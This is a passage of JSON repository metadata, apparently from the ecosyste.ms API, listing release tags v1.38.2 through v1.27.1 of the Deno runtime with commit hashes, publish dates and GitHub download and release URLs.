purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ec